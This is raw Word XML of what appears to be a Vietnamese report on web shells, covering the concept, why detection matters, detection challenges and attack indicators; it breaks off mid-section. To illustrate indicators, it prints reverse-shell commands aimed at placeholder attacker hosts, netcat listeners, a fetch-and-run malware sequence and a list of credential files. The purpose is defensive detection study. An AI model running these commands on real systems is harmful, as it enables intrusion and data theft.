          <w:pgMar w:top="1559" w:right="1440" w:bottom="1440" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgBorders>
            <w:top w:val="none" w:sz="0" w:space="0"/>
            <w:left w:val="none" w:sz="0" w:space="0"/>
            <w:bottom w:val="none" w:sz="0" w:space="0"/>
            <w:right w:val="none" w:sz="0" w:space="0"/>
          </w:pgBorders>
          <w:pgNumType w:fmt="decimal" w:start="1"/>
          <w:cols w:space="720" w:num="1"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_heading=h.liw4e2w9c7nw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkStart w:id="4" w:name="_Toc568534403"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>TỔNG QUAN VỀ WEB SHELL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_heading=h.v6xppwsls3cp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkStart w:id="6" w:name="_Toc1014285347"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>KHÁI NIỆM WEB SHELL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_heading=h.9e93syoner3o" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Web shell là một tập lệnh phía máy chủ (server-side script) được hacker tải lên một máy chủ web đã bị xâm nhập nhằm duy trì quyền truy cập lâu dài trên hệ thống đó.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l "tailieuthamkhao1" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Web shell thường xuất hiện ở giai đoạn hậu khai thác (post-exploitation), sau khi kẻ tấn công đã khai thác thành công các lỗ hổng như SQL Injection (SQLi), Remote File Inclusion (RFI), tải lên tập tin không kiểm soát (unrestricted file upload) hoặc Cross-Site Scripting (XSS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_heading=h.lq53jv91d5cr" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkStart w:id="9" w:name="_Toc1510675631"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>TÍNH CẤP THIẾT CỦA ĐỀ TÀI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Sự phổ biến rộng rãi của các dịch vụ web và thực tế rằng chúng thường tồn tại nhiều lỗ hổng bảo mật, việc phát hiện web shell có ý nghĩa đặc biệt quan trọng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Trong khi nhiều nghiên cứu đã tập trung vào việc bảo vệ dịch vụ web ở giai đoạn tiền khai thác (pre-exploitation), chẳng hạn như rà soát mã nguồn để phát hiện lỗ hổng, hoặc ở giai đoạn đang bị khai thác (during-exploitation), như phát hiện các hành vi xâm nhập lợi dụng lỗ hổng, thì các giải pháp mang tính hệ thống nhằm ngăn chặn các hoạt động hậu khai thác, đặc biệt là phát hiện web shell đã được tải lên máy chủ, vẫn còn tương đối hạn chế.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_heading=h.naqrww9ks58s" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkStart w:id="11" w:name="_Toc2053949414"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>THÁCH THỨC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Một máy chủ web thường chứa số lượng lớn các tập lệnh phía máy chủ như các tập lệnh chức năng, tập lệnh plugin và tập lệnh quản trị. Các tập lệnh này thường xuyên thay đổi do quá trình cập nhật, vá lỗi hoặc tải lên nội dung mới. Vì vậy, việc sử dụng dấu vân tay (fingerprint) hoặc hàm băm của tập lệnh để nhận diện web shell là rất khó khăn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web shell thường không chứa các thành phần khai thác mức thấp như shellcode được viết bằng mã máy. Thay vào đó chúng được xây dựng bằng các ngôn ngữ lập trình bậc cao và sử dụng các hàm có sẵn của ngôn ngữ, vốn cũng được các ứng dụng hợp lệ sử dụng. Do đó, các phương pháp phát hiện dựa trên dấu hiệu khai thác truyền thống thường không hiệu quả đối với web shell. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Quá trình giao tiếp giữa kẻ tấn công và web shell có thể chỉ tiêu tốn một lượng băng thông rất nhỏ. Ví dụ, kẻ tấn công có thể chỉ gửi một vài lệnh trong khoảng cách thời gian rất thưa, khiến hoạt động liên lạc trở nên khó bị phát hiện.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_heading=h.fsulctgcvu5q" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkStart w:id="13" w:name="_Toc793349258"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>CÁC DẤU HIỆU CỦA HÀNH VI TẤN CÔNG WEB SHELL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_heading=h.8pjpzclm30y7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thực thi lệnh hệ điều hành bất thường</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Đây là hành vi phổ biến nhất của Web Shell. Kẻ tấn công sử dụng Web Shell để thực thi các lệnh hệ điều hành từ xa nhằm thu thập thông tin hoặc thao tác trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Các lệnh thường gặp: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id / whoami / hostname / pwd / ls / cat / netstat / ifconfig  / ip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_heading=h.dxhnjwatvtbm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Truy cập các tập tin nhạy cảm (trên hệ điều hành Linux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Sau khi có quyền thực thi lệnh, kẻ tấn công thường đọc các tập tin chứa thông tin quan trọng như:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : thông tin các tài khoản người dùng trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : lưu mật khẩu dưới dạng mã băm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>: ánh xạ tên miền sang IP cục bộ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/resolv.conf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : tập tin cấu hình phân giải tên miền (DNS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : chứa tài khoản - mật khẩu cơ sở dữ liệu, API Key, Secret Key, Token xác thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
          <w:tab w:val="clear" w:pos="1260"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:ind w:left="1258" w:leftChars="0" w:hanging="418" w:firstLineChars="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : tập tin cấu hình web server, chứa toàn bộ dữ liệu quan trọng về server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_heading=h.betksdfp066y" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thiết lập kết nối ra bên ngoài</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hành vi tạo kết nối đến máy chủ điều khiển của kẻ tấn công, các lệnh quan trọng như: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>curl / wget / nc / bash -i / python -c  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Nhằm tạo các kết nối TCP bất thường, kết nối tới địa chỉ IP bên ngoài, liên lạc với Command and Control (C2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_heading=h.dtkvxc8wg5z2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Reverse Shell là một trong những kỹ thuật phổ biến nhất sau khi Web shell được kích hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thay vì mở cổng chờ kết nối, máy chủ nạn nhân sẽ chủ động kết nối tới máy của kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/x.x.x.x/4444 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  : tạo một interactive shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>nc attacker_ip 4444 -e /bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  : gửi kết nối ngược lại cho hacker, cho phép thực thi bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_heading=h.cegueb819xkw" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Thiết lập Listener hoặc Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Kẻ tấn công mở cổng mạng để duy trì quyền truy cập lâu dài trên các cổng không thuộc các dịch vụ thông thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 4444 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>python -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_heading=h.80zdn4akpene" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Tải xuống và thực thi mã độc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Kẻ tấn công thường sẽ tải thêm các công cụ hỗ trợ hoặc mã độc thực hiện tấn công tự động, đây là phương thức tấn công phổ biến trong các cuộc tấn công ransomware, trojan hoặc miner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget malware.bin </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>curl http://attacker/malware.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Sau đó:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x malware.sh </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>./malware.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_heading=h.k3ig5ruiu8yl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Di chuyển ngang </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>Sau khi chiếm được một máy chủ, kẻ tấn công có thể tìm cách tấn công các hệ thống khác trong cùng mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
